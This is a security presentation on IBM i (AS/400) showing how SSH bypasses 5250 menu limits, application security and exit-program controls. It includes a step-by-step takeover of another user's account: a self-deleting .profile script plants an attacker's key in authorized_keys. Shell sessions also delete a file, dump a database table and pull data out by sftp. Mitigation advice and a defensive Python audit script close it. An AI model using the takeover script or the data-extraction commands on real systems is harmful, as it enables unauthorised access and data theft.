
Hackingiseries.com

Insecure Shells: The problem with SSH

By Shalom Carmel

You are going to see how SSH deployment on IBM i may cause unexpected, major security risks.

Shalom Carmel is a security expert and the author of the Hacking iSeries book. He can be contacted at shalom@hackingiseries.com

This presentation is sponsored by Raz-Lee Security, a leading security solution provider for IBM i.


SSH functionality

- sftp, scp: secure file transfer
- ssh: secure shell (like Telnet)
- Available on IBM i since 5.3

SSH is good

- SSH is encrypted; FTP and TELNET are not
- Easy to script file transfers
- SSH can be used to encrypt other cleartext protocols via tunneling
- De-facto standard in Unix/Linux

However

SSH deployment on IBM i may cause unexpected, major security risks.

IBM i security methodology

- System configuration
- Limit user special authorities
- Limit user capabilities
- Application security
- Exit program security
- System object security

Too often not implemented well.

Some system configuration is irrelevant

- Session timeout, limit QSECOFR access, limit virtual devices: these are 5250 policies, irrelevant to SSH
- Password policies: irrelevant to SSH if using private keys

A user has limited capabilities set in the user profile and therefore cannot run some commands.

No limit to user capabilities in SSH

Use the system utility to run the command that was previously blocked:

    Using username "shalom".
    shalom@s520's password:
    $
    $ system dltf NWDB/items
    CPC2191: Object ITEMS in NWDB type *FILE deleted.

SSH disregards 5250 parms

- Ignores user level initial program
- Ignores user level initial menu

No application security

Use the db2 utility to access or modify data:

    $
    $ qsh -c 'db2 "select * from NWDB.products"' > products.txt
    $

No exit program security

Use external sftp tools to get the data out, either from IFS or from a library:

    psftp> open MyAS400
    login as: shalom
    shalom@MyAS400's password:
    Remote working directory is /home/SHALOM
    psftp>
    psftp> get products.txt
    remote:/home/SHALOM/products.txt => local:products.txt
    psftp>
    psftp> get /qsys.lib/nwdb.lib/prices.file/prices.mbr
    remote: /qsys.lib/nwdb.lib/prices.file/prices.mbr => local:prices.mbr

And while we're at it

Let's gather some intelligence for the next phase:

    psftp> cd /qsys.lib
    Remote directory is now /qsys.lib
    psftp> ls *.USRPRF
    Listing directory /qsys.lib
    ?rwx------ 1 qsecofr 0  217088 Mar 13  2011 KOKO.USRPRF
    ?rwx------ 1 qsecofr 0  548864 Mar 13  2011 MARYLIN.USRPRF
    ?rwx---r-x 1 qsecofr 0  389120 Oct 17 14:23 MENNY.USRPRF
    ?rwx------ 1 qsys    0 8466432 Oct 17 16:08 QDBSHR.USRPRF
    ?rwx------ 1 qsys    0 2699264 Oct 17 14:56 QDBSHRDO.USRPRF
    ?rwx------ 1 qsys    0  110592 Mar 13  2011 QTMPLPD.USRPRF
    ?rwx------ 1 qsecofr 0 1150976 Mar 13  2011 RON.USRPRF
    ?rwx------ 1 qsecofr 0  221184 Mar 13  2011 ROSY.USRPRF
    ?rwx------ 1 qsecofr 0  241664 Oct 17 15:45 SHALOM.USRPRF
    ?rwx------ 1 qsecofr 0  258048 Mar 13  2011 TAMMI.USRPRF
    ?rwx------ 1 qsecofr 0 2719744 Mar 13  2011 TOBIAS.USRPRF
    psftp>


List of libraries: possible targets to explore

    psftp> cd /qsys.lib
    Remote directory is now /qsys.lib
    psftp> ls *.LIB
    Listing directory /qsys.lib
    . . .
    drwx------ 1 qdftown 0   2719744 Mar 13  2011 AAETEST2.LIB
    drwx---rwx 1 qdftown 0   7110592 Mar 13  2011 ABCDATAD.LIB
    drwx---rwx 1 vndprof 0 675217088 Mar 13  2011 ABCDATAP.LIB
    drwx---rwx 1 vndprof 0  92699264 Dec 17 14:56 ABCDATAQA.LIB
    drwx---rwx 1 vndprof 0   3466432 Dec 17 16:08 ABCPGMD.LIB
    drwx---rwx 1 vndprof 0   4548864 Mar 13  2011 ABCPGMP.LIB
    drwx---rwx 1 vndprof 0   4389120 Dec 17 14:23 ABCPGMQA.LIB
    drwx------ 1 quser   0    258048 Mar 13  2011 ADTSLAB.LIB
    drwx---rwx 1 benny   0    221184 Mar 13  2011 APBENNY.LIB
    drwx------ 1 quser   0    241664 Oct 17 15:45 APSHPY.LIB
    drwx------ 1 qdftown 0   1150976 Mar 13  2011 AU117FR.LIB
    . . .
    psftp>

So far we have seen that SSH

- Ignores key system values
- Disregards user limited capabilities
- Bypasses application security
- Is not controlled by exit program security

But we still have object security, don't we? And we limited the number of *ALLOBJ users.

IBM i security with SSH

- System configuration
- Limit user special authorities
- Limit user capabilities
- Application security
- Exit program security
- System object security

You are still at risk, because...

You are going to see

How to take over another user's account via SSH

First, some explanations about shells and keys

A shell is

"a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel." (Wikipedia)

On IBM i this is a shell

The regular AS400 5250 menu system and command line:

    USER                            User Tasks                    System: MYAS400

    Select one of the following:

         1. Display or change your job
         2. Display messages
         3. Send a message
         4. Submit a job
         5. Work with your spooled output files
         6. Work with your batch jobs
         7. Display or change your library list
         8. Change your password
         9. Change your user profile

        60. More user task options
        90. Sign off

    Selection or command
    ===>

    F3=Exit   F4=Prompt   F9=Retrieve   F12=Cancel   F13=Information Assistant
    F16=System Main menu
    (C) COPYRIGHT IBM CORP. 1980, 2007.

But so is this

The QSH command:

    QSH Command Entry
    Hello SHALOM
    $

    ===>
    F3=Exit   F6=Print   F9=Retrieve   F12=Disconnect   F13=Clear   F17=Top   F18=Bottom
    F21=CL command entry

And this

PASE AIX emulation: CALL QP2TERM

    /QOpenSys/usr/bin/-sh
    Hello SHALOM
    #

    ===>
    F3=Exit   F6=Print   F9=Retrieve   F11=Truncate/Wrap   F13=Clear   F17=Top   F18=Bottom
    F21=CL command entry

And also SSH

SSH runs in the PASE environment and behaves like PASE, except for different keyboard control.

Shell mix-up

- The AS400 command line is the primary shell
- We're good at limiting it, managing access and setting up defaults
- Very little thought is given to the proper setup of the other shells

SSH private key authentication

- Enabled by default in the sshd configuration
- User creates a private/public key pair
- Public key placed on the server
- Private key can be protected by a passphrase, creating strong, two-factor authentication
- Enterprise SSH key management is difficult

Let's get down to business

Take over another user via SSH

- Possible due to the shell mix-up on IBM i
- I am going to associate my own public key with another user
- The method shown is one of several possible; use your imagination to find other methods
- After takeover, I can log in via SSH as another user, and do stuff as that user
- Changing the password does not help at all

Step 1: Find a user

- Must have access to the user's home directory (simple, because that is the system default)
- Either a user with *ALLOBJ authority, or a user who owns their home directory
- Also requires a user who uses Qshell or PASE

*ALLOBJ considerations

If the perpetrator has *ALLOBJ authority, there are still good reasons for him to be able to masquerade as someone else. A perpetrator with *ALLOBJ can set up another user without the elaborate preparations detailed in this presentation.

Using ssh to find a user

In a previous slide you saw how to list QSYS. Let's look for a user who has a home dir:

    Using username "badguy".
    Authenticating with public key "openssh-key"
    $ cd /home
    $ ls -l
    total 136
    drwxrws---  2 badguy   0  8192 Jan 11 09:25 BADGUY
    drwxrwsrwx  2 goodguy  0  8192 Jan 12 01:45 GOODGUY
    drwxrwsrwx  3 qibmhelp 0  8192 Apr 28  2008 QIBMHELP
    drwxrwsrwx  3 qsecofr  0  8192 Jan 11 10:39 QPGMR
    drwxrwsrwx  2 qsecofr  0 12288 Jan 12 01:57 QSECOFR
    drwx--S---  2 user0011 0  8192 Jan  9 09:31 user0011
    drwx--S---  3 user0022 0  8192 Jan  9 09:31 user0022
    $

Step 2: Create the homedir

The user must already own an existing home directory or have *ALLOBJ authority. If the user has *ALLOBJ authority but no home directory, then the following command will create the home directory for the next steps:

    MKDIR DIR('/home/GOODGUY') DTAAUT(*EXCLUDE) OBJAUT(*NONE)

Step 3: Modify the shell startup

In the home directory, create a file called .profile (with a dot) that does the following:

- Creates a directory called .ssh
- Places my public key in file .ssh/authorized_keys
- Removes all public authority from the home directory, the .ssh directory and authorized_keys
- Sets ownership of the home directory to self

Step 3: Sample .profile script

On the echo command below, the string with the three dots until the \ at the end of the line should be replaced with your public key. The QIBM 5799SS4 SSHD V3.51 string is just for show.

    if [ ! -d .ssh ]
    then
        mkdir .ssh
    fi
    chmod 700 .ssh
    if [ ! -f .ssh/authorized_keys ]
    then
        touch .ssh/authorized_keys
        setccsid 1252 .ssh/authorized_keys
    fi
    echo ssh-rsa AAAAB3Nza...7/rNy8= QIBM 5799SS4 SSHD V3.51 \
        >> .ssh/authorized_keys
    chmod 700 .ssh/authorized_keys
    chmod 700 .
    rm .profile

Step 4: Wait

As previously stated, this only works with users who run interactive, non-5250 shell sessions. Typically, these are the power IT users.

If you have *ALLOBJ authority, you can set up all the necessary files and permissions yourself. Or find another creative way to force a user to run some code. Read my book for ideas!

Private key authentication highlights

- Does not care about expired passwords
- Can log in even if the password is *NONE
- Respects the *DISABLED user status
- Uses special authorities and object permissions
- The authorized_keys file can contain multiple public keys

Mitigation: Prevention

- Manage a white list of allowed users and IP addresses in the sshd configuration file
- Improve the native object security
- Jail (chroot) your ssh users (good luck with it)
- Create a secure home directory for all relevant users
- Get a good security package with integrated ssh support

Mitigation: Audit

- Have a syslog daemon running and log ssh authentication
- Audit the /QOpenSys/etc/profile and /etc/profile files
- Audit the authorized_keys files
- Get a good security package with auditing and syslog support
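A home-directory audit covering two items from the prevention and audit slides: it checks that each home directory is owned by its user and closed to public write (so nobody else can drop a .profile into it), and it inventories the keys in authorized_keys, including entries that carry an options prefix. This is an added example, not code from the presentation; it assumes a POSIX view of the home directories as seen from PASE or QShell, and the sample directory tree and key blob it builds are constructed for the demo.

```python
import base64, hashlib, os, pathlib, re, tempfile
MY_UID = os.getuid()
SAMPLE_BLOB = base64.b64encode(b"\0\0\0\x07ssh-rsa\0\0\0\x01\x03").decode()  # constructed, not a real key
SAMPLE_AK = ("ssh-rsa " + SAMPLE_BLOB + " QIBM 5799SS4 SSHD V3.51\n"
             'from="10.0.0.5",no-pty ssh-ed25519 ' + SAMPLE_BLOB + " laptop\n")
KEY_RE = re.compile(r"(?:^|\s)(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp\d+|"
                    r"sk-[\w.-]+@openssh\.com)\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$")

def parse_authorized_keys(text):
    """(options, key type, SHA256 fingerprint, comment) for each key line."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.search(line)   # an options prefix such as from="..." may precede the key
        if not line or line.startswith("#") or not m:
            continue
        digest = hashlib.sha256(base64.b64decode(m.group(2))).digest()
        fp = "SHA256:" + base64.b64encode(digest).rstrip(b"=").decode()
        keys.append((line[:m.start()].strip(), m.group(1), fp, m.group(3) or ""))
    return keys

def audit_home_dir(path, expected_uid):
    """Findings: ownership, public write access, startup file, and SSH keys."""
    findings, st = [], os.stat(path)
    if st.st_uid != expected_uid:
        findings.append("home not owned by its user")
    if st.st_mode & 0o022:          # anyone who can write here can plant a .profile
        findings.append("home writable by group/others")
    if os.path.exists(os.path.join(path, ".profile")):
        findings.append("shell startup file present: .profile")
    ak = os.path.join(path, ".ssh", "authorized_keys")
    if os.path.exists(ak):
        if os.stat(os.path.dirname(ak)).st_mode & 0o077:
            findings.append(".ssh accessible by group/others")
        with open(ak) as f:         # every key here is a password-less login for this user
            for opts, ktype, fp, comment in parse_authorized_keys(f.read()):
                findings.append(f"key {ktype} {fp} comment={comment!r} options={opts!r}")
    return findings

def build_demo_tree():
    """Constructed fixture: a world-writable home (the permissive default the slides
    rely on) with a planted .profile and keys, and a locked-down home."""
    bad, good = tempfile.mkdtemp(prefix="GOODGUY_"), tempfile.mkdtemp(prefix="USER0011_")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o700)
    os.mkdir(os.path.join(bad, ".ssh"))
    os.chmod(os.path.join(bad, ".ssh"), 0o755)
    pathlib.Path(bad, ".profile").write_text("echo planted\n")
    pathlib.Path(bad, ".ssh", "authorized_keys").write_text(SAMPLE_AK)
    return bad, good
```

Run `audit_home_dir` over each entry of /home with the uid of the profile the directory belongs to; any finding other than the expected key inventory is something to fix before a user's first Qshell or PASE session.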


References

- Jailing your AS400 users: http://bit.ly/A2Jg1r
- SSH in the Midrange wiki: http://bit.ly/kDHUt